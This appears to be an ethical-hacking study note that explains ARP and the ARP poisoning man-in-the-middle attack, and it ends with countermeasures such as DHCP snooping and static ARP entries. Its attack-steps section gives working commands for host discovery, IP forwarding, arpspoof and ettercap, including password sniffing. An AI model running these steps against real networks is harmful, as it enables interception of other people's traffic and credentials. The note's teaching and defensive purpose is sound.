ARP poisoning
ARPβ
- ARP stands for "Address Resolution Protocol"
- π In charge of resolving IP addresses to MAC addresses
- Can be used for obtaining MAC addresses of devices on the network
- Packets are
ARP_REQUEST
andARP_REPLY
- Commands
arp -a
: displays current ARP cachearp -d *
: clears ARP cache
ARP tableβ
- Used to map MAC addresses to ip addresses
- Every network interface has its own ARP table
- π If no ARP entry exist:
- Computer A broadcasts an APR request in network asking for the MAC address from a specific IP.
- Computer B replies its MAC and IP address
- Computer A inserts it to its ARP table for future use
ARP poisoning attackβ
- Also known as β’ ARP spoofing β’Β ARP spoofing β’ ARP cache poisoning β’ ARP poison routing β’ ARP cache flooding β’ ARP flooding.
- Man in the middle attack between the victim and switch.
- Floods the target machines ARP cache with forged requests and responses.
- Exploits ARP not verifying the device authenticity
- If ARP cache becomes full, different behaviors can be observed depending on the manufacturer/implementation:
- May force switch to operates in fail-safe mode
- Behaves as a hub i.e. sends packets to every to all hosts
- Same behavior is also seen in MAC flooding
- In Linux it may:
- Drop the oldest / most stale entry from the table (by garbage collector)
- Reject new entries
- May force switch to operates in fail-safe mode
ARP poisoning attack stepsβ
- Gather information
- Get victim IP address, e.g.
192.168.122.183
- E.g. through host discovery using
nmap
e.g.nmap -sn 192.168.0.0/24
- E.g. through host discovery using
- Get default gateway IP, e.g.
192.168.122.1
- Usually IP of the machine ending with
.1
- Usually same for everyone on same network
- Default gateway is the forwarding host (router) to internet when no other specification matches the destination IP address of a packet.
- Usually IP of the machine ending with
- Get victim IP address, e.g.
- Enable forwarding mode to sniff the traffic
echo 1 > /proc/sys/net/ipv4/ip_forward
in Linux.- βOtherwise no traffic is going through and you're just DOSing.
- Attack
- Deceive the victim device through flooding ARP reply packets to it.
- Change gateways MAC address is to the attackers
- π Use an ARP spoofing tool e.g.
arpspoof
arpspoof -t <victim-machine-ip> <default-gateway-ip>
arpspoof -t <default-gateway-ip> <victim-machine-ip>
ettercap
- Also sniffs passwords automatically
ettercap -NaC <default-gateway-ip> <victim-machine-ip>
N
: make it non-interactivea
: arp posionc
: parse out passwords and usernames.
- Cain and Abel (Cain & Abel) on Windows
- Deceive the victim device through flooding ARP reply packets to it.
- Sniff
ARP poisoning attack countermeasuresβ
- Configure DHCP snooping
- Add static IP-MAC entries to the cache.
- Then it will not process any ARP Replies received unlike a dynamic ARP cache.
- Use Intrusion Detection Systems (IDS)
ARP poisoning countermeasuresβ
- ARP spoofing detection and prevention
- Relies on some form of certification or cross-checking of ARP responses
- Can be implemented on individual hosts, hypervisors or switches
- π E.g. DHCP snooping feature on switch OS can activate Dynamic ARP Inspection with an internal database.
- β Not possible if any host holds a static IP, and static ARP entries must be used.
- Static ARP entries
- Manually mapping IP addresses to MAC addresses (maintaining ARP entries)
- A lot of administrative overhead
- Provides only basic security
- OS security
- Linux ignores unsolicited replies, behavior can often be configured in other OSes